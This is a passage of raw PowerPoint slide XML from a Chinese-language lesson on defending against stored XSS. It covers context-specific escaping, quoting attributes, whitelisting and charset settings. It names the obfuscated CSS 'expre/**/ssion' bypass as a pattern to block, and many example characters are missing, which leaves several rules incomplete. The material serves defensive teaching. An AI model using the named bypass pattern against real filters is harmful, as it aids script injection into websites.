            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>'	&amp;#x27;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>/	&amp;#x2F;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性中不可信字符串进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，并且总是为你的属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>‘ 或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符，用格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者命名实体，如果可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字符以防止开关的值伸出属性。恰当的为属性加上引号可以只被对应的引号转义。不带引号的属性可以被分解为许多个字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包括和。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14482922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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（续）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>事件触发属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的不可信字符串，先进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，因为浏览器在执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串解码前执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性解码。对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的非可信数据，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串转义并且总是将属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符，以格式转义小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的所有字符，以防开关的值伸到脚本中或另一个属性。不要使用类似的转义符号，因为引号符号可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性解析器在第一次运行被匹配。这些转义字符也容易受到”转义已转义”的攻击，攻击者发送和漏洞代码转为使得可以成为引号。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>事件触发属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被正确引号，需要通过相应的引号来闭合。不带引号的属性可以被分割为许多字符，包括另外，一个闭合标签可以闭合脚本块，即使它是一个带引号的字符串。需要注意的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析器在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13082282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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路径进行转义而不是完整的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。总是为属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。绝不允许或包含格式像或或者他们的组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用格式转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字符。如果或属性被正确的引号起来，突破需要对应的引号。未被引号属性可以使用许多字符进行突破，包括和。请注意，这种情况下，实体编码是无用的。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6916334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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>样式属性内的不可信字符串先做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串转义，然后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>转义，因为解析器的解析顺序是先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>解析器然后再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>解析器。总是给你的属性加上引号，如本例子中的风格属性加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( “ ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( ‘ ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。为在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中的不可信字符串做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串转义。也要确保不可信字符串在引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之间，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。也不要允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>以及它的复杂组合，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>expre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ssion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>除了字母数字字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用格式转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的字符。不要使用任何类似的转义符号，因为引号符号可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>属性解析器在第一次运行被匹配。这些转义字符也容易受到”转义已转义”的攻击，攻击者发送和漏洞代码转为使得可以成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>号。如果属性被正确引号，需要通过相应的引号来闭合。不带引号的属性可以被分割为许多字符，包括。同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>标签会关闭风格块，即使是在一个被引号的字符串内。请注意，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>解析器在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>解析器前运行。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5167097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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="8859656" cy="5622474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18518799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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串中不可信的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，先执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串转义，保持这个顺序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序应该允许的来自用户的标签和属性的白名单。黑名单可以很容易的被绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为默认的字符编码以及设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>text/html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不要将用户可以控制的文本放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;meta&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签前。通过使用不同的字符集注射可以导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>告诉你的浏览器遵循标准进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
